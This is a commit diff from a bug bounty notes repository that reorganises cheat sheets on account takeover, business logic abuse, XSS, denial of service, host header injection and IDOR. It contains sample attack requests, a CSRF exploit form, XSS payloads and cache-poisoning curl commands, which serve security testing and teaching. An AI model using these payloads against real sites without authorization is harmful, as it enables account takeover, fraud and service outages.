crash.software
Projects
Pull Requests
Issues
Builds
AllAboutBugBounty
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
Builds
Statistics
Child Projects
cra.sh
RESTful API
Projects STRLCPY AllAboutBugBounty Commits 8c337501
🤬

  • Grouping, adding recon and some tips

  • Loading...
  • MD15 committed 3 years ago
    8c337501
    1 parent 90979cdb
  • ■ ■ ■ ■ ■ ■
    Account Takeover.md
    1  -## Account Takeover
    2  - 
    3  -1. Using OAuth Misconfiguration
    4  - - Victim has a account in evil.com
    5  - - Attacker creates an account on evil.com using OAuth. For example the attacker have a facebook with a registered victim email
    6  - - Attacker changed his/her email to victim email.
    7  - - When the victim try to create an account on evil.com, it says the email already exists.
    8  - 
    9  -2. Try re-sign up using same email
    10  -```
    11  -POST /newaccount
    12  -[...]
    13  -[email protected]&password=1234
    14  -```
    15  -After sign up using victim email, try signup again but using different password
    16  -```
    17  -POST /newaccount
    18  -[...]
    19  -[email protected]&password=hacked
    20  -```
    21  -Source: [Link](https://medium.com/bugbountywriteup/account-takeover-via-csrf-78add8c99526)
    22  - 
    23  -3. via CSRF
    24  - - Create an account as an attacker and fill all the form, check your info in the Account Detail.
    25  - - Change the email and capture the request, then created a CSRF Exploit.
    26  - - The CSRF Exploit looks like as given below. I have replaced the email value to anyemail@*******.com and submitted a request in the victim’s account.
    27  - 
    28  -```html
    29  -<html>
    30  -<body>
    31  - <form action="https://evil.com/user/change-email" method="POST">
    32  - <input type="hidden" value="[email protected]"/>
    33  - <input type="submit" value="Submit Request">
    34  - </form>
    35  -</body>
    36  -</html>
    37  -```
    38  -Source: [Link](https://medium.com/bugbountywriteup/account-takeover-via-csrf-78add8c99526)
    39  - 
    40  -4. Chaining with IDOR, for example
    41  -```
    42  -POST /changepassword.php
    43  -Host: site.com
    44  -[...]
    45  -userid=500&password=heked123
    46  -```
    47  -500 is an attacker ID and 501 is a victim ID, so we change the userid from attacker to victim ID
    48  - 
    49  -5. No Rate Limit on 2FA
  • ■ ■ ■ ■ ■ ■
    Business Logic Errors.md
    1 1  # Business Logic Errors
     2 + 
     3 +## **Introduction**
     4 +Business Logic Errors are ways of using the legitimate processing flow of an application in a way that results in a negative consequence to the organization.
     5 + 
     6 +## **How to Find**
    2 7  1. Review Functionality
    3  -- Some applications have an option where verified reviews are marked with some tick or it's mentioned. Try to see if you can post a review as a Verified Reviewer without purchasing that product.
    4  -- Some app provides you with an option to provide a rating on a scale of 1 to 5, try to go beyond/below the scale-like provide 0 or 6 or -ve.
    5  -- Try to see if the same user can post multiple ratings for a product. This is an interesting endpoint to check for Race Conditions.
    6  -- Try to see if the file upload field is allowing any exts, it's often observed that the devs miss out on implementing protections on such endpoints.
    7  -- Try to post reviews like some other users.
    8  -- Try performing CSRF on this functionality, often is not protected by tokens
     8 + - Some applications have an option where verified reviews are marked with some tick or it's mentioned. Try to see if you can post a review as a Verified Reviewer without purchasing that product.
     9 + - Some app provides you with an option to provide a rating on a scale of 1 to 5, try to go beyond/below the scale-like provide 0 or 6 or -ve.
     10 + - Try to see if the same user can post multiple ratings for a product. This is an interesting endpoint to check for Race Conditions.
     11 + - Try to see if the file upload field is allowing any exts, it's often observed that the devs miss out on implementing protections on such endpoints.
     12 + - Try to post reviews like some other users.
     13 + - Try performing CSRF on this functionality, often is not protected by tokens
    9 14   
    10 15  2. Coupon Code Functionality
    11  -- Apply the same code more than once to see if the coupon code is reusable.
    12  -- If the coupon code is uniquely usable, try testing for Race Condition on this function by using the same code for two accounts at a parallel time.
    13  -- Try Mass Assignment or HTTP Parameter Pollution to see if you can add multiple coupon codes while the application only accepts one code from the Client Side.
    14  -- Try performing attacks that are caused by missing input sanitization such as XSS, SQLi, etc. on this field
    15  -- Try adding discount codes on the products which are not covered under discounted items by tampering with the request on the server-side.
     16 + - Apply the same code more than once to see if the coupon code is reusable.
     17 + - If the coupon code is uniquely usable, try testing for Race Condition on this function by using the same code for two accounts at a parallel time.
     18 + - Try Mass Assignment or HTTP Parameter Pollution to see if you can add multiple coupon codes while the application only accepts one code from the Client Side.
     19 + - Try performing attacks that are caused by missing input sanitization such as XSS, SQLi, etc. on this field
     20 + - Try adding discount codes on the products which are not covered under discounted items by tampering with the request on the server-side.
    16 21   
    17 22  3. Delivery Charges Abuse
    18  -- Try tampering with the delivery charge rates to -ve values to see if the final amount can be reduced.
    19  -- Try checking for the free delivery by tampering with the params.
     23 + - Try tampering with the delivery charge rates to -ve values to see if the final amount can be reduced.
     24 + - Try checking for the free delivery by tampering with the params.
    20 25   
    21 26  4. Currency Arbitrage
    22  -- Pay in 1 currency say USD and try to get a refund in EUR. Due to the diff in conversion rates, it might be possible to gain more amount.
     27 + - Pay in 1 currency say USD and try to get a refund in EUR. Due to the diff in conversion rates, it might be possible to gain more amount.
    23 28  
    24 29  5. Premium Feature Abuse
    25  -- Try forcefully browsing the areas or some particular endpoints which come under premium accounts.
    26  -- Pay for a premium feature and cancel your subscription. If you get a refund but the feature is still usable, it's a monetary impact issue.
    27  -- Some applications use true-false request/response values to validate if a user is having access to premium features or not.
    28  -- Try using Burp's Match & Replace to see if you can replace these values whenever you browse the app & access the premium features.
    29  -- Always check cookies or local storage to see if any variable is checking if the user should have access to premium features or not.
     30 + - Try forcefully browsing the areas or some particular endpoints which come under premium accounts.
     31 + - Pay for a premium feature and cancel your subscription. If you get a refund but the feature is still usable, it's a monetary impact issue.
     32 + - Some applications use true-false request/response values to validate if a user is having access to premium features or not.
     33 + - Try using Burp's Match & Replace to see if you can replace these values whenever you browse the app & access the premium features.
     34 + - Always check cookies or local storage to see if any variable is checking if the user should have access to premium features or not.
    30 35   
    31 36  6. Refund Feature Abuse
    32  -- Purchase a product (usually some subscription) and ask for a refund to see if the feature is still accessible.
    33  -- Try for currency arbitrage explained yesterday.
    34  -- Try making multiple requests for subscription cancellation (race conditions) to see if you can get multiple refunds.
     37 + - Purchase a product (usually some subscription) and ask for a refund to see if the feature is still accessible.
     38 + - Try for currency arbitrage explained yesterday.
     39 + - Try making multiple requests for subscription cancellation (race conditions) to see if you can get multiple refunds.
    35 40   
    36 41  7. Cart/Wishlist Abuse
    37  -- Add a product in negative quantity with other products in positive quantity to balance the amount.
    38  -- Add a product in more than the available quantity.
    39  -- Try to see when you add a product to your wishlist and move it to a cart if it is possible to move it to some other user's cart or delete it from there.
     42 + - Add a product in negative quantity with other products in positive quantity to balance the amount.
     43 + - Add a product in more than the available quantity.
     44 + - Try to see when you add a product to your wishlist and move it to a cart if it is possible to move it to some other user's cart or delete it from there.
    40 45   
    41 46  8. Thread Comment Functionality
    42  -- Unlimited Comments on a thread
    43  -- Suppose a user can comment only once, try race conditions here to see if multiple comments are possible.
    44  -- Suppose there is an option: comment by the verified user (or some privileged user) try to tamper with various parameters in order to see if you can do this activity.
    45  -- Try posting comments impersonating some other users.
     47 + - Unlimited Comments on a thread
     48 + - Suppose a user can comment only once, try race conditions here to see if multiple comments are possible.
     49 + - Suppose there is an option: comment by the verified user (or some privileged user) try to tamper with various parameters in order to see if you can do this activity.
     50 + - Try posting comments impersonating some other users.
    46 51   
    47 52  9. Parameter Tampering
    48  -- Tamper Payment or Critical Fields to manipulate their values
    49  -- Add multiple fields or unexpected fields by abusing HTTP Parameter Pollution & Mass Assignment
    50  -- Response Manipulation to bypass certain restrictions such as 2FA Bypass
     53 + - Tamper Payment or Critical Fields to manipulate their values
     54 + - Add multiple fields or unexpected fields by abusing HTTP Parameter Pollution & Mass Assignment
     55 + - Response Manipulation to bypass certain restrictions such as 2FA Bypass
    51 56   
    52  -10. App Implementation Logic Abuse
    53  -- If an app accepts JSON data, try changing content type to XML and see if the XML data is being processed, it can be left vulnerable to XXE or XML-based attacks.
    54  -- If an application is using the DELETE method to delete a resource but there is no CSRF protection, try converting the method to GET/POST and add an additional parameter like ?method=delete
    55  -- In the above case if any user ID is going in the request, try bypassing method-based restrictions by adding parameters like X-Method-Override.
    56  -- If you see a UUID, try to replace with similar mapping such as 1,2,3.. often UUID mapping is accepted by the applications.
    57  -- Try the HEAD method to bypass the authentication restrictions.
    58  - 
    59  -11. Denial of Service Situations
    60  -- Resource Exhaustion
    61  -- Weak Account Lockout Mechanisms
    62  -- Kicking out a user/banning a user somehow from accessing the application.
    63  -- Application Level DoS by abusing the various functionalities present within the application.
    64  - 
    65  -Source: [@harshbothra_](https://twitter.com/harshbothra_)
     57 +Reference:
     58 +- [@harshbothra_](https://twitter.com/harshbothra_)
  • ■ ■ ■ ■ ■
    Cross Site Scripting.md
    1 1  # XSS Cheat Sheet (Basic)
     2 + 
     3 +## **Introduction**
     4 +Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into websites. There is 3 types of XSS Attack:
     5 +- Reflected XSS
     6 + 
     7 + Attack where the malicious script runs from another website through the web browser
     8 +- Stored XSS
     9 +
     10 + Stored attacks are those where the injected script is permanently stored on the target servers
     11 +- DOM-Based XSS
     12 + 
     13 + A type of XSS that has payloads found in the DOM rather than within the HTML code.
     14 + 
     15 +## **Payloads**
    2 16  1. Basic payload
    3 17  ```html
    4 18  <script>alert(1)</script>
    skipped 84 lines
    89 103  </script>
    90 104  ```
    91 105   
    92  -# XSS Cheat Sheet (Advanced)
     106 +## **XSS Cheat Sheet (Advanced)**
    93 107  7. Use when input lands in a script block, inside a string delimited value.
    94 108  ```html
    95 109  '-alert(1)-'
    skipped 178 lines
    274 288   
    275 289  > Add a "]]>" if input lands in a CDATA section
    276 290   
    277  -# XSS Cheat Sheet (Bypass)
     291 +## **XSS Cheat Sheet (Bypass)**
    278 292  19. Mixed Case
    279 293  ```html
    280 294  <Script>alert(document.cookie)</Script>
    skipped 40 lines
    321 335  ```html
    322 336  <!--><svg onload=alert(1)-->
    323 337  ```
     338 + 
     339 +Reference:
     340 +- [Brute Logic](https://brutelogic.com.br/)
  • ■ ■ ■ ■ ■ ■
    Denial Of Service.md
    1 1  # Denial of Service
    2 2   
     3 +## **Introduction**
     4 +Denial of Service is a type of attack on a service that disrupts its normal function and prevents other users from accessing it
     5 +## **How to Find**
     6 + 
    3 7  1. Cookie bomb
    4  -```
    5  -https://target.com/index.php?param1=xxxxxxxxxxxxxxxxxxxxxx
    6  -```
    7  -After input "xxxxxxxxxxxxxxxxxxxxxx" as a value of param1, check your cookies. If there is cookies the value is "xxxxxxxxxxxxxxxxxxxxxx" it means the website is vulnerable
    8 8  
    9  -References: [Hackerone #105363](https://hackerone.com/reports/105363)
     9 + ```
     10 + https://target.com/index.php?param1=xxxxxxxxxxxxxx
     11 + ```
     12 +After input "xxxxxxxxxxxxxx" as a value of param1, check your cookies. If there is cookies the value is "xxxxxxxxxxxxxxxxxxxxxx" it means the website is vulnerable
    10 13   
    11 14  2. Try input a very long payload to form. For example using very long password or using very long email
    12  -```
    13  -POST /Register
    14  -[...]
     15 + ```
     16 + POST /Register
     17 + [...]
    15 18   
    16  -username=victim&password=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    17  -```
    18  - 
    19  -References: [Hackerone #840598](https://hackerone.com/reports/840598)
    20  - 
    21  -3. Cache poisoning, can using header "X-Forwarded-Port" or "X-Forwarded-Host"
    22  -```
    23  -curl -H "X-Forwarded-Port: 123" https://target.com/index.php?poison=1
    24  -```
    25  -```
    26  -curl -H "X-Forwarded-Host: target.com:123" https://target.com/index.php?poison=1
    27  -```
    28  - 
    29  -Reference: [Hackerone #409370](https://hackerone.com/reports/409370)
     19 + username=victim&password=aaaaaaaaaaaaaaa
     20 + ```
    30 21   
    31  -4. Pixel flood, using image with a huge pixels
     22 +3. Pixel flood, using image with a huge pixels
    32 23   
    33 24  Download the payload: [Here](https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/000/000/128/5f5a974e5f67ab7a11d2d92bd40f8997969f2f17/lottapixel.jpg?response-content-disposition=attachment%3B%20filename%3D%22lottapixel.jpg%22%3B%20filename%2A%3DUTF-8%27%27lottapixel.jpg&response-content-type=image%2Fjpeg&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAQGK6FURQYFO7EZHL%2F20200910%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20200910T110133Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEFIaCXVzLXdlc3QtMiJGMEQCIGgY3dUtffr4V%2BoxTJaFxc%2F7qjRodT3XLyN1ZLEF8%2FhfAiAXklx1Zvy3iKIGm1bocpDUP1cTx46eTbsDOKqRC93fgyq0AwhbEAEaDDAxMzYxOTI3NDg0OSIMH9s8JiCh%2B%2FNADeibKpEDocuqfbmxkM5H5iKsA3K4RuwcxVT9ORLJrjJO%2FILAm%2BcNsQXTgId%2Bpw1KOLkbFKrq0BQIC6459JtfWqHPXvDC7ZJGboQ%2FXE0F%2BAZQa6jaEyldrkKuDewNy5jy3VX1gquS%2BWrGl%2BGhwmXB4cg1jgOugGUsC%2FxD%2BcragIJAtGA7lp3YdcL%2FiQbnvuzmLP8w%2FyCHPUrpOw94bPOk8fpetOJoLmDfXZdL3hLGBEUGS7dSOoyebLSXGZDctkSpnXCq383lWYWYn0LSv1ooVvuCVzgxE%2BZi4b4QvLjjMG3FJdEX%2BDYmnDvnSrRoDtyj8bD3cP3xbZ3jaNYRbIlQTm2zR1DgoaDGE74FmpZWHcyC8zK0V6AKG6OzkcIaGRnGdDNSpZkN0DrWE7uY6BLiIGY16rflYOaElnbxijoMNDsU3MZH8gGk7crYJ%2FCeHeayInPBDgiREBgn7orAIjOY3xg8vzwKO96a90LmkK7wk977TbKfLIng1iNP9EMKYDjGePdBYDML9zBeqhO5LrVH%2BfbwzG5GXi0w5fnn%2BgU67AFRBwMChVRr%2FLW4j0PqpXUeN5ysVIuagoqSwqOhfwI9rtk56zTuGhO3du4raY5SOQ9vSkRdYHhga%2BW7oQTByD1ISiSaOjHs1s%2FrNfvIfMA8r0drPSykOdCuV2A5NhBpEPpT%2BuOosogdPihcORhO3hbcQJ9y4uxBsaBSJr%2F8S2CGjwZw7SOGmNaNFsPu%2BMRbYDA%2FH2eUMBl96w6KpUuNAXEPUcfq3weRMP1vXW62S4OyniYJ6DEVRkkE4eFZMUqy4c94uwSAegK54Po0V0sPM%2FncTESCgBf7Qe2zZlPhdRGZR%2F25cF6JTH0t2VIRQw%3D%3D&X-Amz-Signature=a837cb6b26bf437fa5008695310a21788918081c36e745d286c5cba9fd4a78e0)
    34 25   
    35  -References: [Hackerone #390](https://hackerone.com/reports/390)
    36  - 
    37  -5. Frame flood, using GIF with a huge frame
     26 +4. Frame flood, using GIF with a huge frame
    38 27   
    39 28  Download the payload: [Here](https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/000/000/136/902000ac102f14a36a4d83ed9b5c293017b77fc7/uber.gif?response-content-disposition=attachment%3B%20filename%3D%22uber.gif%22%3B%20filename%2A%3DUTF-8%27%27uber.gif&response-content-type=image%2Fgif&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAQGK6FURQ245MJJPA%2F20200910%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20200910T110848Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEFMaCXVzLXdlc3QtMiJHMEUCIEC768ifpRHeEUucuNuVL%2FdcSsWMnGeNp%2FMhKs6afB01AiEAiZOP%2FwMaeQMITUni3aFcACIOqOHnWHgLKuXHRrb5LooqtAMIXBABGgwwMTM2MTkyNzQ4NDkiDHHy9PJ2ccl9cmsvyCqRA6bliBHBMPXR6NYflM%2BCXCCQ5VLdPCATpmLs9DhVuYsjxR3JUtVHnBvtfEYYWDWWsLoC3xuzmug5ycrAvqK%2BTYDYO7l4HD1rXfyEBkR579ZlUFab6bOL4i8nDqblun%2FeV253Sgd6GzL4E%2FXmUN%2FC6qNydSd9hp2fLoyNjqob6o5zJjmnqvZsq50ROOZwf1idkDtr163qeVZERnan7aY9rM%2FsX4iVdE4wY0rLw1maGRuDF2aLVCxPB681htsHt%2FpoZ18QY7LjcbNjbjB4PgXLd1sm5zQ4q9mPVxTZPvzo9BJCh7l6kMLHCtJXOXfrvvN8UBgIqr1KXvodzv7FRQYcvEpfw4pwCTWzBs8VeEcwS9gjOXFMNLNI8SZ9V76VQ5KrOIpKhzM9UQQN3DVzY3SwMHydX%2B%2BYcQTt%2FjvqTkorsltqob2g5E1K0U8btRLBvBqOo0Vbr75zLcLUUomDBQzSNSvJgTN43huYmkZxBpWAAId72Tt6m56aFQLXkCKGSoMxYjrrVW9jc37pVl3lZU7FIX0AMIuN6PoFOusBpDCrjFwR1Y7t7W8wLapYjI6yOkkvWTFwWvx38jZl9okqo5xchKolmKxKX7cfGPIyuUmSXc1xa0nKwYeOYlhQZfyI0NobqyWW81ITuuUjsBxULuqrXqfVl0PTjTTpqe%2FHvU6wYSE358XfggtcqaH9PPgNDOejgv%2FLnh9AH9nyqIWuaCu865IfAOupVVzFzQilyB2LDyQtTS4Kp5dHyEAibRQlqeKHWOkUE2mQefAaTxKLRKrs0mJQYSuC%2B4LQEB3Cq9Nhj5HN%2BYT7A7CDLrvyChyfYXQZYr0lR1jN91Yd7SBe2jB1Qls%2Bx%2FEUlQ%3D%3D&X-Amz-Signature=910a3812cf3b69f6fa72f39a89a6df2f395f8d17ef8702eeb164a0477c64fff5)
    40 29   
    41  -References: [Hackerone #400](https://hackerone.com/reports/400)
    42  - 
    43  -6. Sometimes in website we found a parameter that can adjust the size of the image, for example
     30 +5. Sometimes in website we found a parameter that can adjust the size of the image, for example
    44 31  ```
    45 32  https://target.com/img/vulnerable.jpg?width=500&height=500
    46 33  ```
    skipped 2 lines
    49 36  https://target.com/img/vulnerable.jpg?width=99999999999&height=99999999999
    50 37  ```
    51 38   
    52  -References: [Hackerone #751904](https://hackerone.com/reports/751904)
    53  - 
    54  -7. Try changing the value of the header with something new, for example:
     39 +6. Try changing the value of the header with something new, for example:
    55 40  ```
    56 41  Accept-Encoding: gzip, gzip, deflate, br, br
    57 42  ```
    58 43   
    59  -References: [Hackerone #861170](https://hackerone.com/reports/861170)
     44 +7. Sometimes if you try bug "No rate limit", after a long try it. The server will go down because there is so much requests
    60 45   
    61  -8. Sometimes if you try bug "No rate limit", after a long try it. The server will go down because there is so much requests
     46 +8. ReDoS (Regex DoS) occurs due to poorly implemented RegEx
    62 47   
    63  -References: [Hackerone #892615](https://hackerone.com/reports/892615)
    64  - 
    65  -9. ReDoS (Regex DoS) occurs due to poorly implemented RegEx
    66  - 
    67  -References: [Hackerone #511381](https://hackerone.com/reports/511381)
    68  - 
    69  -10. CPDoS ([Cache Poisoned Denial of Service](https://cpdos.org/))
     48 +9. CPDoS ([Cache Poisoned Denial of Service](https://cpdos.org/))
    70 49  - HTTP Header Oversize (HHO)
    71 50  
    72 51   A malicious client sends an HTTP GET request including a header larger than the size supported by the origin server but smaller than the size supported by the cache
    skipped 50 lines
    123 102   Host: www.hackerone.com
    124 103   X-Forwarded-Port: 123
    125 104   ```
     105 + 
    126 106  - X-Forwarded-Host
    127 107   ```
    128 108   GET /index.php?dontpoisoneveryone=1 HTTP/1.1
    skipped 4 lines
    133 113  ![Response DoS](https://portswigger.net/cms/images/6f/83/45a1a9f841b9-article-screen_shot_2018-09-13_at_11.08.12.png)
    134 114   
    135 115  References:
     116 +- [Hackerone #840598](https://hackerone.com/reports/840598)
     117 +- [Hackerone #105363](https://hackerone.com/reports/105363)
     118 +- [Hackerone #390](https://hackerone.com/reports/390)
     119 +- [Hackerone #400](https://hackerone.com/reports/400)
     120 +- [Hackerone #751904](https://hackerone.com/reports/751904)
     121 +- [Hackerone #861170](https://hackerone.com/reports/861170)
     122 +- [Hackerone #892615](https://hackerone.com/reports/892615)
     123 +- [Hackerone #511381](https://hackerone.com/reports/511381)
    136 124  - [Hackerone #409370](https://hackerone.com/reports/409370)
    137 125  - [CPDoS](https://cpdos.org/)
  • ■ ■ ■ ■ ■ ■
    Exposed Source Code.md
    1 1  # Exposed Source Code
    2 2   
     3 +## **Introduction**
     4 +Source code intended to be kept server-side can sometimes end up being disclosed to users. Such code may contain sensitive information such as database passwords and secret keys, which may help malicious users formulate attacks against the application.
     5 +## **How to Find**
     6 + 
    3 7  1. Exposed Git folder
    4 8  ```
    5 9  https://site.com/.git
    skipped 17 lines
    23 27  http://target.com/.bzr
    24 28  ```
    25 29  ![BZR folder](https://1.bp.blogspot.com/-67WO_kL_iB8/XliKl1jggAI/AAAAAAAAATc/mWBw7igq05EdKR3JZmbXYN4LqjpBOrESgCLcBGAsYHQ/s1600/1.png)
     30 + 
     31 +Reference:
     32 +- [NakanoSec (my own post)](https://www.nakanosec.com/2020/02/exposed-source-code-pada-website.html)
  • ■ ■ ■ ■ ■
    Host Header Injection.md
    1 1  # Host Header Injection
    2 2   
     3 +## **Introduction**
     4 +HTTP Host header attacks exploit vulnerable websites that handle the value of the Host header in an unsafe way. If the server implicitly trusts the Host header, and fails to validate or escape it properly, an attacker may be able to use this input to inject harmful payloads that manipulate server-side behavior. Attacks that involve injecting a payload directly into the Host header are often known as "Host header injection" attacks.
     5 + 
     6 +## **How to Find**
     7 + 
    3 8  1. Change the host header
    4 9  ```
    5 10  GET /index.php HTTP/1.1
    skipped 36 lines
    42 47  Host: evil-website.com
    43 48  ...
    44 49  ```
    45  -Source: https://portswigger.net/web-security/host-header/exploiting
     50 +Reference:
     51 +- [PortSwigger](https://portswigger.net/web-security/host-header/exploiting)
    46 52   
  • ■ ■ ■ ■ ■ ■
    Insecure Direct Object References.md
    1  -## IDOR (Insecure Direct Object Reference)
     1 +# Insecure Direct Object Reference (IDOR)
     2 + 
     3 +## **Introduction**
     4 +IDOR stands for Insecure Direct Object Reference is a security vulnerability in which a user is able to access and make changes to data of any other user present in the system.
     5 + 
     6 +## **How to Find**
    2 7  1. Add parameters onto the endpoints for example, if there was
    3  -```html
     8 +```
    4 9  GET /api/v1/getuser
    5 10  [...]
    6 11  ```
    7 12  Try this to bypass
    8  -```html
     13 +```
    9 14  GET /api/v1/getuser?id=1234
    10 15  [...]
    11 16  ```
    12 17   
    13 18  2. HTTP Parameter pollution
    14  - 
    15  -```html
     19 +```
    16 20  POST /api/get_profile
    17 21  [...]
    18 22  user_id=hacker_id&user_id=victim_id
    19 23  ```
    20 24   
    21 25  3. Add .json to the endpoint
    22  - 
    23  -```html
     26 +```
    24 27  GET /v2/GetData/1234
    25 28  [...]
    26 29  ```
    27 30  Try this to bypass
    28  -```html
     31 +```
    29 32  GET /v2/GetData/1234.json
    30 33  [...]
    31 34  ```
    32 35   
    33 36  4. Test on outdated API Versions
    34  - 
    35  -```html
     37 +```
    36 38  POST /v2/GetData
    37 39  [...]
    38 40  id=123
    39 41  ```
    40 42  Try this to bypass
    41  -```html
     43 +```
    42 44  POST /v1/GetData
    43 45  [...]
    44 46  id=123
    45 47  ```
    46 48   
    47 49  5. Wrap the ID with an array.
    48  - 
    49  -```html
     50 +```
    50 51  POST /api/get_profile
    51 52  [...]
    52 53  {"user_id":111}
    53 54  ```
    54 55  Try this to bypass
    55  -```html
     56 +```
    56 57  POST /api/get_profile
    57 58  [...]
    58 59  {"id":[111]}
    59 60  ```
    60 61   
    61 62  6. Wrap the ID with a JSON object
    62  - 
    63  -```html
     63 +```
    64 64  POST /api/get_profile
    65 65  [...]
    66 66  {"user_id":111}
    67 67  ```
    68 68  Try this to bypass
    69  -```html
     69 +```
    70 70  POST /api/get_profile
    71 71  [...]
    72 72  {"user_id":{"user_id":111}}
    73 73  ```
    74 74   
    75 75  7. JSON Parameter Pollution
    76  - 
    77  -```html
     76 +```
    78 77  POST /api/get_profile
    79 78  [...]
    80 79  {"user_id":"hacker_id","user_id":"victim_id"}
    81 80  ```
    82 81   
    83 82  8. Try decode the ID, if the ID encoded using md5,base64,etc
    84  -```html
     83 +```
    85 84  GET /GetUser/dmljdGltQG1haWwuY29t
    86 85  [...]
    87 86  ```
    88 87  dmljdGltQG1haWwuY29t => [email protected]
    89 88   
    90 89  9. If the website using graphql, try to find IDOR using graphql!
    91  -```html
     90 +```
    92 91  GET /graphql
    93 92  [...]
    94 93  ```
    95  -```html
     94 +```
    96 95  GET /graphql.php?query=
    97 96  [...]
    98 97  ```
    99 98   
    100  -10. MFLAC (Missing Function Level Access Control)
     99 +10. MFLAC (Missing Function Level Access Control)
    101 100  ```
    102 101  GET /admin/profile
    103 102  ```
    skipped 2 lines
    106 105  GET /ADMIN/profile
    107 106  ```
    108 107   
    109  -Source: [@swaysThinking](https://twitter.com/swaysThinking) and other medium writeup!
    110  - 
     108 +Reference:
     109 +- [@swaysThinking](https://twitter.com/swaysThinking) and other medium writeup
  • ■ ■ ■ ■ ■ ■
    Misc/Account Takeover.md
     1 +# Account Takeover
     2 + 
     3 +## **Introduction**
     4 +Account Takeover (known as ATO) is a type of identity theft where a bad actor gains unauthorized access to an account belonging to someone else.
     5 + 
     6 +## **How to Find**
     7 +1. Using OAuth Misconfiguration
     8 + - Victim has a account in evil.com
     9 + - Attacker creates an account on evil.com using OAuth. For example the attacker have a facebook with a registered victim email
     10 + - Attacker changed his/her email to victim email.
     11 + - When the victim try to create an account on evil.com, it says the email already exists.
     12 + 
     13 +2. Try re-sign up using same email
     14 + ```
     15 + POST /newaccount
     16 + [...]
     17 + [email protected]&password=1234
     18 + ```
     19 + After sign up using victim email, try signup again but using different password
     20 + ```
     21 + POST /newaccount
     22 + [...]
     23 + [email protected]&password=hacked
     24 + ```
     25 + 
     26 +3. via CSRF
     27 + - Create an account as an attacker and fill all the form, check your info in the Account Detail.
     28 + - Change the email and capture the request, then created a CSRF Exploit.
     29 + - The CSRF Exploit looks like as given below. I have replaced the email value to anyemail@*******.com and submitted a request in the victim’s account.
     30 + 
     31 + ```html
     32 + <html>
     33 + <body>
     34 + <form action="https://evil.com/user/change-email" method="POST">
     35 + <input type="hidden" value="[email protected]"/>
     36 + <input type="submit" value="Submit Request">
     37 + </form>
     38 + </body>
     39 + </html>
     40 + ```
     41 + 
     42 +4. Chaining with IDOR, for example
     43 + ```
     44 + POST /changepassword.php
     45 + Host: site.com
     46 + [...]
     47 + userid=500&password=heked123
     48 + ```
     49 + 500 is an attacker ID and 501 is a victim ID, so we change the userid from attacker to victim ID
     50 + 
     51 +5. No Rate Limit on 2FA
     52 + 
     53 +References:
     54 +- [Pre-Account Takeover using OAuth Misconfiguration](https://vijetareigns.medium.com/pre-account-takeover-using-oauth-misconfiguration-ebd32b80f3d3)
     55 +- [Account Takeover via CSRF](https://medium.com/bugbountywriteup/account-takeover-via-csrf-78add8c99526)
     56 +- [How re-signing up for an account lead to account takeover](https://zseano.medium.com/how-re-signing-up-for-an-account-lead-to-account-takeover-3a63a628fd9f)
  • Password Reset Flaws.md Misc/Password Reset Flaws.md
    Content is identical
  • ■ ■ ■ ■ ■
    README.md
    skipped 1 lines
    2 2  These are my bug bounty notes that I have gathered from various sources, you can contribute to this repository too!
    3 3   
    4 4  ## List
    5  -- [Account Takeover](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Account%20Takeover.md)
    6 5  - [Business Logic Errors](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Business%20Logic%20Errors.md)
    7 6  - [Cross Site Scripting (XSS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Scripting.md)
    8 7  - [Denial of Service (DoS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Denial%20Of%20Service.md)
    9 8  - [Exposed Source Code](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Denial%20Of%20Service.md)
    10 9  - [Host Header Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Host%20Header%20Injection.md)
    11 10  - [Insecure Direct Object References (IDOR)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Insecure%20Direct%20Object%20References.md)
    12  -- [Password Reset Flaws](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Password%20Reset%20Flaws.md)
    13 11  - [Web Cache Poisoning](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Web%20Cache%20Poisoning.md)
    14 12   
    15 13  ## List Bypass
    skipped 12 lines
    28 26  - [Zend](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Framework/Zend.MD)
    29 27   
    30 28  ## Miscellaneous
    31  -- [Jira](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Unauthenticated%20Jira%20CVE.md)
     29 +- [Account Takeover](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Account%20Takeover.md)
     30 +- [Password Reset Flaws](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Password%20Reset%20Flaws.md)
     31 +- [Unauthenticated Jira CVE](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Unauthenticated%20Jira%20CVE.md)
    32 32   
    33 33  ## Reconnaissance
    34  -* ### __Small Scope__
    35  -Only Specific URLs are part of Scope. This usually includes staging/dev/testing or single URLs.
    36  -- [x] Directory Enumeration
    37  -- [x] Technology Fingerprinting
    38  -- [x] Port Scanning
    39  -- [x] Parameter Fuzzing
    40  -- [x] Wayback History
    41  -- [x] Known Vulnerabilities
    42  -- [x] Hardcoded Information in JavaScript
    43  -- [x] Domain Specific GitHub & Google Dorking
    44  -- [x] Broken Link Hijacking
    45  -- [x] Data Breach Analysis
    46  -- [x] Misconfigured Cloud Storage
    47  -* ### __Medium Scope__
    48  -Usually the scope is wild card scope where all the subdomains are part of scope
    49  -- [x] Subdomain Enumeration
    50  -- [x] Subdomain Takeover
    51  -- [x] Probing & Technology Fingerprinting
    52  -- [x] Port Scanning
    53  -- [x] Known Vulnerabilities
